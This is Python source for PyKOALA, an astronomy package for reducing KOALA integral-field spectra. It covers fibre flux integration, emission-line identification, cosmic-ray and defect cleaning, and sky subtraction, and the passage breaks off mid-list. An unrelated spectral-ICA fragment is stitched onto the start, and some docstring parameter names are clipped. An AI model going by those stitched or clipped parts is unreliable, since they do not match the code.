psi_i = A2_nrm @ Phi[:, i] / np.sqrt((srtdE[i + 1]))
# [Psi, psi_i]
Psi_list.append(psi_i)
# convert Psi_list back into an array, shaped like MATLAB version
Psi = np.array(Psi_list).T
# psi have have very small imaginary values ...
# cast to real here, but need to check
Psi = np.real(Psi)
# print('Psi.shape', Psi.shape)
print('done')
# Since close to a degenerate case - try to rotate according to:
# <NAME> and <NAME>, "Spectral ICA", ACHA 2007.
#
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# # PyKOALA: KOALA data processing and analysis
# by <NAME> and <NAME>
# Extra work by <NAME> (MQ PACE student)
# Plus Taylah and Matt (sky subtraction)
from __future__ import absolute_import, division, print_function
from past.utils import old_div
version = "Version 0.72 - 13th February 2020"
import copy
import os.path as pth
import sys
from astropy.convolution import Gaussian2DKernel, interpolate_replace_nans
from astropy.io import fits
from astropy.wcs import WCS
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import numpy as np
from scipy import interpolate
from scipy.ndimage.interpolation import shift
import scipy.signal as sig
from .constants import C, PARSEC as pc
from .utils.cube_alignment import offset_between_cubes, compare_cubes, align_n_cubes
from .utils.flux import search_peaks, fluxes, dfluxes, substract_given_gaussian
from .utils.io import read_table, save_rss_fits, save_fits_file
from .utils.moffat import fit_Moffat
from .utils.plots import (
plot_redshift_peaks, plot_weights_for_getting_smooth_spectrum,
plot_correction_in_fibre_p_fibre, plot_suspicious_fibres_graph, plot_skyline_5578,
plot_offset_between_cubes, plot_response, plot_telluric_correction, plot_plot
)
from .utils.sky_spectrum import scale_sky_spectrum, median_filter
from .utils.spectrum_tools import rebin_spec_shift, smooth_spectrum
from .utils.utils import (
FitsExt, FitsFibresIFUIndex, coord_range, median_absolute_deviation,
)
from ._version import get_versions
__version__ = get_versions()["version"]
del get_versions
# -----------------------------------------------------------------------------
# Define constants
# -----------------------------------------------------------------------------
DATA_PATH = pth.join(pth.dirname(__file__), "data")
# -----------------------------------------------------------------------------
# Define COLOUR scales
# -----------------------------------------------------------------------------
fuego_color_map = colors.LinearSegmentedColormap.from_list(
"fuego",
(
(0.25, 0, 0),
(0.5, 0, 0),
(1, 0, 0),
(1, 0.5, 0),
(1, 0.75, 0),
(1, 1, 0),
(1, 1, 1),
),
N=256,
gamma=1.0,
)
fuego_color_map.set_bad("lightgray")
plt.register_cmap(cmap=fuego_color_map)
projo = [0.25, 0.5, 1, 1.0, 1.00, 1, 1]
pverde = [0.00, 0.0, 0, 0.5, 0.75, 1, 1]
pazul = [0.00, 0.0, 0, 0.0, 0.00, 0, 1]
# -----------------------------------------------------------------------------
# RSS CLASS
# -----------------------------------------------------------------------------
class RSS(object):
"""
Collection of row-stacked spectra (RSS).
Attributes
----------
wavelength: np.array(float)
Wavelength, in Angstroms.
intensity: np.array(float)
Intensity :math:`I_\lambda` per unit wavelength.
variance: np.array(float)
Variance :math:`\sigma^2_\lambda` per unit wavelength
(note the square in the definition of the variance).
"""
# -----------------------------------------------------------------------------
def __init__(self):
self.description = "Undefined row-stacked spectra (RSS)"
self.n_spectra = 0
self.n_wave = 0
self.wavelength = np.zeros((0))
self.intensity = np.zeros((0, 0))
self.intensity_corrected = self.intensity
self.variance = np.zeros_like(self.intensity)
self.RA_centre_deg = 0.0
self.DEC_centre_deg = 0.0
self.offset_RA_arcsec = np.zeros((0))
self.offset_DEC_arcsec = np.zeros_like(self.offset_RA_arcsec)
self.ALIGNED_RA_centre_deg = 0.0 # Added by ANGEL, 6 Sep
self.ALIGNED_DEC_centre_deg = 0.0 # Added by ANGEL, 6 Sep
self.relative_throughput = np.ones((0)) # Added by ANGEL, 16 Sep
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def compute_integrated_fibre(
self,
list_spectra="all",
valid_wave_min=0,
valid_wave_max=0,
min_value=0.1,
plot=False,
title=" - Integrated values",
warnings=True,
text="...",
correct_negative_sky=False,
):
"""
Compute the integrated flux of a fibre in a particular range, valid_wave_min to valid_wave_max.
Parameters
----------
list_spectra: float (default "all")
list with the number of fibres for computing integrated value
if using "all" it does all fibres
valid_wave_min, valid_wave_max : float
the integrated flux value will be computed in the range [valid_wave_min, valid_wave_max]
(default = , if they all 0 we use [self.valid_wave_min, self.valid_wave_max]
min_value: float (default 0)
For values lower than min_value, we set them as min_value
plot : Boolean (default = False)
Plot
title : string
Title for the plot
text: string
A bit of extra text
warnings : Boolean (default = False)
Write warnings, e.g. when the integrated flux is negative
correct_negative_sky : Boolean (default = False)
Corrects negative values making 0 the integrated flux of the lowest fibre
Example
----------
integrated_fibre_6500_6600 = star1r.compute_integrated_fibre(valid_wave_min=6500, valid_wave_max=6600,
title = " - [6500,6600]", plot = True)
"""
print("\n Computing integrated fibre values {}".format(text))
if list_spectra == "all":
list_spectra = list(range(self.n_spectra))
if valid_wave_min == 0:
valid_wave_min = self.valid_wave_min
if valid_wave_max == 0:
valid_wave_max = self.valid_wave_max
self.integrated_fibre = np.zeros(self.n_spectra)
region = np.where(
(self.wavelength > valid_wave_min) & (self.wavelength < valid_wave_max)
)
waves_in_region = len(region[0])
n_negative_fibres = 0
negative_fibres = []
for i in range(self.n_spectra):
self.integrated_fibre[i] = np.nansum(self.intensity_corrected[i, region])
if self.integrated_fibre[i] < 0:
if warnings:
print(
" WARNING: The integrated flux in fibre {:4} is negative, flux/wave = {:10.2f}, (probably sky), CHECK !".format(
i, self.integrated_fibre[i]/waves_in_region
))
n_negative_fibres = n_negative_fibres + 1
# self.integrated_fibre[i] = min_value
negative_fibres.append(i)
if len(negative_fibres) != 0:
print("\n> Number of fibres with integrated flux < 0 : {:4}, that is the {:5.2f} % of the total !".format(
n_negative_fibres, n_negative_fibres * 100.0 / self.n_spectra
))
negative_fibres_sorted = []
integrated_intensity_sorted = np.argsort(
self.integrated_fibre/waves_in_region
)
for fibre_ in range(n_negative_fibres):
negative_fibres_sorted.append(integrated_intensity_sorted[fibre_])
# print "\n> Checking results using",n_negative_fibres,"fibres with the lowest integrated intensity"
# print " which are :",negative_fibres_sorted
if correct_negative_sky:
min_sky_value = self.integrated_fibre[negative_fibres_sorted[0]]
min_sky_value_per_wave = min_sky_value/waves_in_region
print(
"\n> Correcting negative values making 0 the integrated flux of the lowest fibre, which is {:4} with {:10.2f} counts/wave".format(
negative_fibres_sorted[0], min_sky_value_per_wave
))
# print self.integrated_fibre[negative_fibres_sorted[0]]
self.integrated_fibre = self.integrated_fibre - min_sky_value
for i in range(self.n_spectra):
self.intensity_corrected[i] = (
self.intensity_corrected[i] - min_sky_value_per_wave
)
else:
print(
"\n> Adopting integrated flux = {:5.2f} for all fibres with negative integrated flux (for presentation purposes)".format(
min_value
))
for i in negative_fibres_sorted:
self.integrated_fibre[i] = min_value
# for i in range(self.n_spectra):
# if self.integrated_fibre[i] < 0:
# if warnings: print " WARNING: The integrated flux in fibre {:4} STILL is negative, flux/wave = {:10.2f}, (probably sky), CHECK !".format(i,self.integrated_fibre[i]/waves_in_region)
if plot:
# print"\n Plotting map with integrated values:"
self.RSS_map(
self.integrated_fibre,
norm=colors.PowerNorm(gamma=1.0 / 4.0),
title=title,
)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def identify_el(
self,
high_fibres=10,
brightest_line="Ha",
cut=1.5,
fibre=0,
broad=1.0,
verbose=True,
plot=True,
):
"""
Identify fibres with highest intensity (high_fibres=10).
Add all in a single spectrum.
Identify emission features.
These emission features should be those expected in all the cube!
Also, choosing fibre=number, it identifies el in a particular fibre.
Parameters
----------
high_fibres: float (default 10)
use the high_fibres highest intensity fibres for identifying
brightest_line : string (default "Ha")
string name with the emission line that is expected to be the brightest in integrated spectrum
cut: float (default 1.5)
The peak has to have a cut higher than cut to be considered as emission line
fibre: integer (default 0)
If fibre is given, it identifies emission lines in the given fibre
broad: float (default 1.0)
Broad (FWHM) of the expected emission lines
verbose : boolean (default = True)
Write results
plot : boolean (default = False)
Plot results
Example
----------
self.el=self.identify_el(high_fibres=10, brightest_line = "Ha",
cut=2., verbose=True, plot=True, fibre=0, broad=1.5)
"""
if fibre == 0:
integrated_intensity_sorted = np.argsort(self.integrated_fibre)
region = []
for fibre in range(high_fibres):
region.append(integrated_intensity_sorted[-1 - fibre])
if verbose:
print("\n> Identifying emission lines using the {} fibres with the highest integrated intensity".format(high_fibres))
print(" which are : {}".format(region))
combined_high_spectrum = np.nansum(self.intensity_corrected[region], axis=0)
else:
combined_high_spectrum = self.intensity_corrected[fibre]
if verbose:
print("\n> Identifying emission lines in fibre {}".format(fibre))
# Search peaks
peaks, peaks_name, peaks_rest, continuum_limits = search_peaks(
self.wavelength,
combined_high_spectrum,
plot=plot,
cut=cut,
brightest_line=brightest_line,
verbose=False,
)
p_peaks_l = []
p_peaks_fwhm = []
# Do Gaussian fit and provide center & FWHM (flux could be also included, not at the moment as not abs. flux-cal done)
if verbose:
print("\n Emission lines identified:")
for eline in range(len(peaks)):
lowlow = continuum_limits[0][eline]
lowhigh = continuum_limits[1][eline]
highlow = continuum_limits[2][eline]
highhigh = continuum_limits[3][eline]
resultado = fluxes(
self.wavelength,
combined_high_spectrum,
peaks[eline],
verbose=False,
broad=broad,
lowlow=lowlow,
lowhigh=lowhigh,
highlow=highlow,
highhigh=highhigh,
plot=plot,
fcal=False,
)
p_peaks_l.append(resultado[1])
p_peaks_fwhm.append(resultado[5])
if verbose:
print(" {:3}. {:7s} {:8.2f} centered at {:8.2f} and FWHM = {:6.2f}".format(
eline + 1,
peaks_name[eline],
peaks_rest[eline],
p_peaks_l[eline],
p_peaks_fwhm[eline],
))
return [peaks_name, peaks_rest, p_peaks_l, p_peaks_fwhm]
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def correct_high_cosmics_and_defects(
self,
step=50,
correct_high_cosmics=False,
fibre_p=0,
remove_5578=False, # if fibre_p=fibre plots the corrections in that fibre
clip_high=100,
warnings=False,
plot=True,
plot_suspicious_fibres=True,
verbose=False,
fig_size=12,
):
"""
Task for correcting high cosmics and CCD defects using median values of nearby pixels.
2dFdr corrects for (the majority) of the cosmic rays, usually correct_high_cosmics = False.
ANGEL COMMENT: Check, probably can be improved using MATT median running + plotting outside
Parameters
----------
rect_high_cosmics: boolean (default = False)
Correct ONLY CCD defects
re_p: integer (default = 0)
Plots the corrections in fibre fibre_p
ove_5578: boolean (default = False)
Removes skyline 5578 (blue spectrum) using Gaussian fit
ND CHECK: This also MODIFIES the throughput correction correcting for flux_5578_medfilt /median_flux_5578_medfilt
step: integer (default = 50)
Number of points for calculating median value
clip_high : float (default = 100)
Minimum value of flux/median in a pixel to be consider as a cosmic
if s[wave] > clip_high*fit_median[wave] -> IT IS A COSMIC
verbose: boolean (default = False)
Write results
warnings: boolean (default = False)
Write warnings
plot: boolean (default = False)
Plot results
plot_suspicious_fibres: boolean (default = False)
Plots fibre(s) that could have a cosmic left (but it could be OK)
IF self.integrated_fibre[fibre]/median_running[fibre] > max_value -> SUSPICIOUS FIBRE
Example
----------
self.correct_high_cosmics_and_defects(correct_high_cosmics=False, step=40, remove_5578 = True,
clip_high=120, plot_suspicious_fibres=True, warnings=True, verbose=False, plot=True)
"""
print("\n> Correcting for high cosmics and CCD defects...")
wave_min = self.valid_wave_min # CHECK ALL OF THIS...
wave_max = self.valid_wave_max
wlm = self.wavelength
if correct_high_cosmics == False:
print(" Only CCD defects (nan and negative values) are considered.")
else:
print(" Using clip_high = {} for high cosmics".format(clip_high))
print(" IMPORTANT: Be sure that any emission or sky line is fainter than clip_high/continuum !! ")
flux_5578 = [] # For correcting sky line 5578 if requested
if wave_min < 5578 and remove_5578:
print(" Sky line 5578 will be removed using a Gaussian fit...")
integrated_fibre_uncorrected = self.integrated_fibre
print(" ")
output_every_few = np.sqrt(self.n_spectra) + 1
next_output = -1
max_ratio_list = []
for fibre in range(self.n_spectra):
if fibre > next_output:
sys.stdout.write("\b" * 30)
sys.stdout.write(
" Cleaning... {:5.2f}% completed".format(
fibre * 100.0 / self.n_spectra
)
)
sys.stdout.flush()
next_output = fibre + output_every_few
s = self.intensity_corrected[fibre]
running_wave = []
running_step_median = []
cuts = np.int(self.n_wave/step) # using np.int instead of // for improved readability
for cut in range(cuts):
if cut == 0:
next_wave = wave_min
else:
next_wave = np.nanmedian(
(wlm[np.int(cut * step)] + wlm[np.int((cut + 1) * step)])/2
)
if next_wave < wave_max:
running_wave.append(next_wave)
# print("SEARCHFORME1", step, running_wave[cut])
region = np.where(
(wlm > running_wave[cut] - np.int(step/2)) # step/2 doesn't need to be an int, but probably
& (wlm < running_wave[cut] + np.int(step/2)) # want it to be so the cuts are uniform.
)
# print('SEARCHFORME3', region)
running_step_median.append(
np.nanmedian(self.intensity_corrected[fibre, region])
)
running_wave.append(wave_max)
region = np.where((wlm > wave_max - step) & (wlm < wave_max))
running_step_median.append(
np.nanmedian(self.intensity_corrected[fibre, region])
)
for i in range(len(running_step_median)):
if np.isnan(running_step_median[i]) == True:
if i < 10:
running_step_median[i] = np.nanmedian(running_step_median[0:9])
if i > 10:
running_step_median[i] = np.nanmedian(
running_step_median[-9:-1]
)
a7x, a6x, a5x, a4x, a3x, a2x, a1x, a0x = np.polyfit(
running_wave, running_step_median, 7
)
fit_median = (
a0x
+ a1x * wlm
+ a2x * wlm ** 2
+ a3x * wlm ** 3
+ a4x * wlm ** 4
+ a5x * wlm ** 5
+ a6x * wlm ** 6
+ a7x * wlm ** 7
)
if fibre == fibre_p:
espectro_old = copy.copy(self.intensity_corrected[fibre, :])
espectro_fit_median = fit_median
for wave in range(self.n_wave): # (1,self.n_wave-3):
if s[wave] < 0:
s[wave] = fit_median[wave] # Negative values for median values
if np.isnan(s[wave]) == True:
s[wave] = fit_median[wave] # nan for median value
if (
correct_high_cosmics and fit_median[wave] > 0
): # NEW 15 Feb 2019, v7.1 2dFdr takes well cosmic rays
if s[wave] > clip_high * fit_median[wave]:
if verbose:
print(" "
"CLIPPING HIGH = {} in fibre {} w = {} value= {} v/median= {}".format(clip_high, fibre, wlm[wave], s[wave], s[wave]/fit_median[wave])) # " median=",fit_median[wave]
s[wave] = fit_median[wave]
if fibre == fibre_p:
espectro_new = copy.copy(s)
max_ratio_list.append(np.nanmax(s/fit_median))
self.intensity_corrected[fibre, :] = s
# Removing Skyline 5578 using Gaussian fit if requested
if wave_min < 5578 and remove_5578:
resultado = fluxes(
wlm, s, 5578, plot=False, verbose=False
) # fmin=-5.0E-17, fmax=2.0E-16,
# resultado = [rms_cont, fit[0], fit_error[0], gaussian_flux, gaussian_flux_error, fwhm, fwhm_error, flux, flux_error, ew, ew_error, spectrum ]
self.intensity_corrected[fibre] = resultado[11]
flux_5578.append(resultado[3])
sys.stdout.write("\b" * 30)
sys.stdout.write(" Cleaning... 100.00 completed")
sys.stdout.flush()
max_ratio = np.nanmax(max_ratio_list)
print("\n Maximum value found of flux/continuum = {}".format(max_ratio))
if correct_high_cosmics:
print(" Recommended value for clip_high = {} , here we used {}".format(int(max_ratio + 1), clip_high))
# Plot correction in fibre p_fibre
if fibre_p > 0:
plot_correction_in_fibre_p_fibre(fig_size,
wlm,
espectro_old,
espectro_fit_median,
espectro_new,
fibre_p,
clip_high)
# print" "
if correct_high_cosmics == False:
text = "for spectra corrected for defects..."
title = " - Throughput + CCD defects corrected"
else:
text = "for spectra corrected for high cosmics and defects..."
title = " - Throughput + high-C & D corrected"
self.compute_integrated_fibre(
valid_wave_min=wave_min,
valid_wave_max=wave_max,
text=text,
plot=plot,
title=title,
)
if plot:
print(" Plotting integrated fibre values before and after correcting for high cosmics and CCD defects:\n")
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.plot(integrated_fibre_uncorrected, "r", label="Uncorrected", alpha=0.5)
plt.ylabel("Integrated Flux")
plt.xlabel("Fibre")
plt.ylim(
[np.nanmin(self.integrated_fibre), np.nanmax(self.integrated_fibre)]
)
plt.title(self.description)
# Check if integrated value is high
median_running = []
step_f = 10
max_value = 2.0 # For stars this is not accurate, as i/m might be between 5 and 100 in the fibres with the star
skip = 0
suspicious_fibres = []
for fibre in range(self.n_spectra):
if fibre < step_f:
median_value = np.nanmedian(
self.integrated_fibre[0: np.int(step_f)]
)
skip = 1
if fibre > self.n_spectra - step_f:
median_value = np.nanmedian(
self.integrated_fibre[-1 - np.int(step_f): -1]
)
skip = 1
if skip == 0:
median_value = np.nanmedian(
self.integrated_fibre[
fibre - np.int(step_f/2): fibre + np.int(step_f/2) # np.int is used instead of // of readability
]
)
median_running.append(median_value)
if self.integrated_fibre[fibre]/median_running[fibre] > max_value:
print(" Fibre {} has a integrated/median ratio of {} -> Might be a cosmic left!".format(fibre, self.integrated_fibre[fibre]/median_running[fibre]))
label = np.str(fibre)
plt.axvline(x=fibre, color="k", linestyle="--")
plt.text(fibre, self.integrated_fibre[fibre] / 2.0, label)
suspicious_fibres.append(fibre)
skip = 0
plt.plot(self.integrated_fibre, label="Corrected", alpha=0.6)
plt.plot(median_running, "k", label="Median", alpha=0.6)
plt.legend(frameon=False, loc=1, ncol=3)
plt.minorticks_on()
#plt.show()
#plt.close()
if plot_suspicious_fibres == True and len(suspicious_fibres) > 0:
# Plotting suspicious fibres..
figures = plot_suspicious_fibres_graph(
self,
suspicious_fibres,
fig_size,
wave_min,
wave_max,
intensity_corrected_fiber=self.intensity_corrected)
if remove_5578 and wave_min < 5578:
print(" Skyline 5578 has been removed. Checking throughput correction...")
flux_5578_medfilt = sig.medfilt(flux_5578, np.int(5))
median_flux_5578_medfilt = np.nanmedian(flux_5578_medfilt)
extra_throughput_correction = flux_5578_medfilt/median_flux_5578_medfilt
# plt.plot(extra_throughput_correction)
# plt.show()
# plt.close()
if plot:
fig = plot_skyline_5578(fig_size, flux_5578, flux_5578_medfilt)
print(" Variations in throughput between {} and {} ".format(
np.nanmin(extra_throughput_correction), np.nanmax(extra_throughput_correction)
))
print(" Applying this extra throughtput correction to all fibres...")
for i in range(self.n_spectra):
self.intensity_corrected[i, :] = (
self.intensity_corrected[i, :]/extra_throughput_correction[i]
)
self.relative_throughput = (
self.relative_throughput * extra_throughput_correction
)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def clean_sky_residuals(
self,
extra_w=1.3,
step=25,
dclip=3.0,
wave_min=0,
wave_max=0,
verbose=False,
plot=False,
fig_size=12,
fibre=0,
):
"""
This task HAVE TO BE USED WITH EXTREME CARE
as it has not been properly tested!!!
It CAN DELETE REAL (faint) ABSORPTION/EMISSION features in spectra!!!
Use the "1dfit" option for getting a better sky substraction
ANGEL is keeping this here just in case it is eventually useful...
Parameters
----------
extra_w
step
dclip
wave_min
wave_max
verbose
plot
fig_size
fibre
Returns
-------
"""
# verbose=True
wlm = self.wavelength
if wave_min == 0:
wave_min = self.valid_wave_min
if wave_max == 0:
wave_max = self.valid_wave_max
# Exclude ranges with emission lines if needed
exclude_ranges_low = []
exclude_ranges_high = []
exclude_ranges_low_ = []
exclude_ranges_high_ = []
if self.el[1][0] != 0:
# print " Emission lines identified in the combined spectrum:"
for el in range(len(self.el[0])):
# print " {:3}. - {:7s} {:8.2f} centered at {:8.2f} and FWHM = {:6.2f}".format(el+1,self.el[0][el],self.el[1][el],self.el[2][el],self.el[3][el])
if (
self.el[0][el] == "Ha" or self.el[1][el] == 6583.41
): # Extra extend for Ha and [N II] 6583
extra = extra_w * 1.6
else:
extra = extra_w
exclude_ranges_low_.append(
self.el[2][el] - self.el[3][el] * extra
) # center-1.3*FWHM/2
exclude_ranges_high_.append(
self.el[2][el] + self.el[3][el] * extra
) # center+1.3*FWHM/2
# print self.el[0][el],self.el[1][el],self.el[2][el],self.el[3][el],exclude_ranges_low[el],exclude_ranges_high[el],extra
# Check overlapping ranges
skip_next = 0
for i in range(len(exclude_ranges_low_) - 1):
if skip_next == 0:
if exclude_ranges_high_[i] > exclude_ranges_low_[i + 1]:
# Ranges overlap, now check if next range also overlaps
if i + 2 < len(exclude_ranges_low_):
if exclude_ranges_high_[i + 1] > exclude_ranges_low_[i + 2]:
exclude_ranges_low.append(exclude_ranges_low_[i])
exclude_ranges_high.append(exclude_ranges_high_[i + 2])
skip_next = 2
if verbose:
print("Double overlap {} {}".format(exclude_ranges_low[-1], exclude_ranges_high[-1]))
else:
exclude_ranges_low.append(exclude_ranges_low_[i])
exclude_ranges_high.append(exclude_ranges_high_[i + 1])
skip_next = 1
if verbose:
print("Overlap {} {}".format(exclude_ranges_low[-1], exclude_ranges_high[-1]))
else:
exclude_ranges_low.append(exclude_ranges_low_[i])
exclude_ranges_high.append(exclude_ranges_high_[i])
if verbose:
print("Overlap {} {}".format(exclude_ranges_low[-1], exclude_ranges_high[-1]))
else:
if skip_next == 1:
skip_next = 0
if skip_next == 2:
skip_next = 1
if verbose:
print(exclude_ranges_low_[i], exclude_ranges_high_[i], skip_next)
if skip_next == 0:
exclude_ranges_low.append(exclude_ranges_low_[-1])
exclude_ranges_high.append(exclude_ranges_high_[-1])
if verbose:
print(exclude_ranges_low_[-1], exclude_ranges_high_[-1], skip_next)
# print "\n> Cleaning sky residuals in range [",wave_min,",",wave_max,"] avoiding emission lines... "
print("\n> Cleaning sky residuals avoiding emission lines... ")
if verbose:
print(" Excluded ranges using emission line parameters:")
for i in range(len(exclude_ranges_low_)):
print(exclude_ranges_low_[i], exclude_ranges_high_[i])
print(" Excluded ranges considering overlaps: ")
for i in range(len(exclude_ranges_low)):
print(exclude_ranges_low[i], exclude_ranges_high[i])
print(" ")
else:
exclude_ranges_low.append(20000.0)
exclude_ranges_high.append(30000.0)
print("\n> Cleaning sky residuals...")
say_status = 0
if fibre != 0:
f_i = fibre
f_f = fibre + 1
print(" Checking fibre {} (only this fibre is corrected, use fibre = 0 for all)...".format(fibre))
plot = True
else:
f_i = 0
f_f = self.n_spectra
for fibre in range(f_i, f_f): # (self.n_spectra):
if fibre == say_status:
print(" Checking fibre {} ...".format(fibre))
say_status = say_status + 100
s = self.intensity_corrected[fibre]
fit_median = smooth_spectrum(
wlm,
s,
step=step,
wave_min=wave_min,
wave_max=wave_max,
weight_fit_median=1.0,
plot=False,
)
old = []
if plot:
for i in range(len(s)):
old.append(s[i])
disp = s - fit_median
dispersion = np.nanmedian(np.abs(disp))
rango = 0
imprimir = 1
for i in range(len(wlm) - 1):
# if wlm[i] > wave_min and wlm[i] < wave_max : # CLEAN ONLY IN VALID WAVEVELENGTHS
if (
wlm[i] >= exclude_ranges_low[rango]
and wlm[i] <= exclude_ranges_high[rango]
):
if verbose == True and imprimir == 1:
print(" Excluding range [ {} , {} ] as it has an emission line".format(
exclude_ranges_low[rango], exclude_ranges_high[rango]))
if imprimir == 1:
imprimir = 0
# print " Checking ", wlm[i]," NOT CORRECTED ",s[i], s[i]-fit_median[i]
else:
if np.isnan(s[i]) == True:
s[i] = fit_median[i] # nan for median value
if (
disp[i] > dispersion * dclip
and disp[i + 1] < -dispersion * dclip
):
s[i] = fit_median[i]
s[i + 1] = fit_median[i + 1] # "P-Cygni-like structures
if verbose:
print(" Found P-Cygni-like feature in {}".format(wlm[i]))
if disp[i] > dispersion * dclip or disp[i] < -dispersion * dclip:
s[i] = fit_median[i]
if verbose:
print(" Clipping feature in {}".format(wlm[i]))
if wlm[i] > exclude_ranges_high[rango] and imprimir == 0:
if verbose:
print(" Checked {} End range {} {} {}".format(
wlm[i], rango,
exclude_ranges_low[rango],
exclude_ranges_high[rango]
)
)
rango = rango + 1
imprimir = 1
if rango == len(exclude_ranges_low):
rango = len(exclude_ranges_low) - 1
# print " Checking ", wlm[i]," CORRECTED IF NEEDED",s[i], s[i]-fit_median[i]
# if plot:
# for i in range(6):
# plt.figure(figsize=(fig_size, fig_size/2.5))
# plt.plot(wlm,old-fit_median, "r-", alpha=0.4)
# plt.plot(wlm,fit_median-fit_median,"g-", alpha=0.5)
# plt.axhline(y=dispersion*dclip, color="g", alpha=0.5)
# plt.axhline(y=-dispersion*dclip, color="g", alpha=0.5)
# plt.plot(wlm,s-fit_median, "b-", alpha=0.7)
#
# for exclude in range(len(exclude_ranges_low)):
# plt.axvspan(exclude_ranges_low[exclude], exclude_ranges_high[exclude], facecolor='g', alpha=0.15,zorder=3)
#
# plt.ylim(-100,200)
# if i == 0: plt.xlim(wlm[0]-10,wlm[-1]+10)
# if i == 1: plt.xlim(wlm[0],6500) # THIS IS FOR 1000R
# if i == 2: plt.xlim(6500,6700)
# if i == 3: plt.xlim(6700,7000)
# if i == 4: plt.xlim(7000,7300)
# if i == 5: plt.xlim(7300,wlm[-1])
# plt.minorticks_on()
# plt.xlabel("Wavelength [$\AA$]")
# plt.ylabel("Flux / continuum")
# plt.show()
# plt.close()
if plot:
for i in range(6):
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.plot(wlm, old, "r-", alpha=0.4)
plt.plot(wlm, fit_median, "g-", alpha=0.5)
# plt.axhline(y=dispersion*dclip, color="g", alpha=0.5)
# plt.axhline(y=-dispersion*dclip, color="g", alpha=0.5)
plt.plot(wlm, s, "b-", alpha=0.7)
for exclude in range(len(exclude_ranges_low)):
plt.axvspan(
exclude_ranges_low[exclude],
exclude_ranges_high[exclude],
facecolor="g",
alpha=0.15,
zorder=3,
)
plt.ylim(-300, 300)
if i == 0:
plt.xlim(wlm[0] - 10, wlm[-1] + 10)
if i == 1:
plt.xlim(wlm[0], 6500) # THIS IS FOR 1000R
if i == 2:
plt.xlim(6500, 6700)
if i == 3:
plt.xlim(6700, 7000)
if i == 4:
plt.xlim(7000, 7300)
if i == 5:
plt.xlim(7300, wlm[-1])
plt.minorticks_on()
plt.xlabel("Wavelength [$\AA$]")
plt.ylabel("Flux / continuum")
# plt.show()
# plt.close()
self.intensity_corrected[fibre, :] = s
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def fit_and_substract_sky_spectrum(
self,
sky,
w=1000,
spectra=1000,
# If rebin == True, it fits all wavelengths to be at the same wavelengths that SKY spectrum...
rebin=False,
brightest_line="Ha",
brightest_line_wavelength=6563.0,
maxima_sigma=3.0,
ymin=-50,
ymax=1000,
wmin=0,
wmax=0,
auto_scale_sky=False,
warnings=False,
verbose=False,
plot=False,
fig_size=12,
fibre=0,
):
"""
Given a 1D sky spectrum, this task fits
sky lines of each spectrum individually and substracts sky
Needs the observed wavelength (brightest_line_wavelength) of the brightest emission line (brightest_line) .
w is the wavelength
spec the 2D spectra
Parameters
----------
sky
w
spectra
rebin
brightest_line
brightest_line_wavelength
maxima_sigma
ymin
ymax
wmin
wmax
auto_scale_sky
warnings
verbose
plot
fig_size
fibre
Returns
-------
"""
if brightest_line_wavelength == 6563:
print("\n\n> WARNING: This is going to FAIL as the wavelength of the brightest emission line has not been included !!!")
print(" USING brightest_line_wavelength = 6563 as default ...\n\n")
brightest_line_wavelength_rest = 6562.82
if brightest_line == "O3" or brightest_line == "O3b":
brightest_line_wavelength_rest = 5006.84
if brightest_line == "Hb" or brightest_line == "hb":
brightest_line_wavelength_rest = 4861.33
print(" Using {:3} at rest wavelength {:6.2f} identified by the user at {:6.2f} to avoid fitting emission lines...".format(
brightest_line, brightest_line_wavelength_rest, brightest_line_wavelength
))
redshift = brightest_line_wavelength/brightest_line_wavelength_rest - 1.0
if w == 1000:
w = self.wavelength
if spectra == 1000:
spectra = copy.deepcopy(self.intensity_corrected)
if wmin == 0:
wmin = w[0]
if wmax == 0:
wmax = w[-1]
# Read file with sky emission lines
sky_lines_file = "sky_lines.dat"
(
sl_center,
sl_name,
sl_fnl,
sl_lowlow,
sl_lowhigh,
sl_highlow,
sl_highhigh,
sl_lmin,
sl_lmax,
) = read_table(sky_lines_file, ["f", "s", "f", "f", "f", "f", "f", "f", "f"])
number_sl = len(sl_center)
# MOST IMPORTANT EMISSION LINES IN RED
# 6300.30 [OI] -0.263 30.0 15.0 20.0 40.0
# 6312.10 [SIII] -0.264 30.0 18.0 5.0 20.0
# 6363.78 [OI] -0.271 20.0 4.0 5.0 30.0
# 6548.03 [NII] -0.296 45.0 15.0 55.0 75.0
# 6562.82 Ha -0.298 50.0 25.0 35.0 60.0
# 6583.41 [NII] -0.300 62.0 42.0 7.0 35.0
# 6678.15 HeI -0.313 20.0 6.0 6.0 20.0
# 6716.47 [SII] -0.318 40.0 15.0 22.0 45.0
# 6730.85 [SII] -0.320 50.0 30.0 7.0 35.0
# 7065.28 HeI -0.364 30.0 7.0 7.0 30.0
# 7135.78 [ArIII] -0.374 25.0 6.0 6.0 25.0
# 7318.39 [OII] -0.398 30.0 6.0 20.0 45.0
# 7329.66 [OII] -0.400 40.0 16.0 10.0 35.0
# 7751.10 [ArIII] -0.455 30.0 15.0 15.0 30.0
# 9068.90 [S-III] -0.594 30.0 15.0 15.0 30.0
el_list_no_z = [
6300.3,
6312.10,
6363.78,
6548.03,
6562.82,
6583.41,
6678.15,
6716.47,
6730.85,
7065.28,
7135.78,
7318.39,
7329.66,
7751.1,
9068.9,
]
el_list = (redshift + 1) * np.array(el_list_no_z)
# [OI] [SIII] [OI] Ha+[NII] HeI [SII] HeI [ArIII] [OII] [ArIII] [SIII]
el_low_list_no_z = [
6296.3,
6308.1,
6359.8,
6544.0,
6674.2,
6712.5,
7061.3,
7131.8,
7314.4,
7747.1,
9063.9,
]
el_high_list_no_z = [
6304.3,
6316.1,
6367.8,
6590.0,
6682.2,
6736.9,
7069.3,
7139.8,
7333.7,
7755.1,
9073.9,
]
el_low_list = (redshift + 1) * np.array(el_low_list_no_z)
el_high_list = (redshift + 1) * np.array(el_high_list_no_z)
# Double Skylines
dsky1 = [
6257.82,
6465.34,
6828.22,
6969.70,
7239.41,
7295.81,
7711.50,
7750.56,
7853.391,
7913.57,
7773.00,
7870.05,
8280.94,
8344.613,
9152.2,
9092.7,
9216.5,
8827.112,
8761.2,
0,
] # 8760.6, 0]#
dsky2 = [
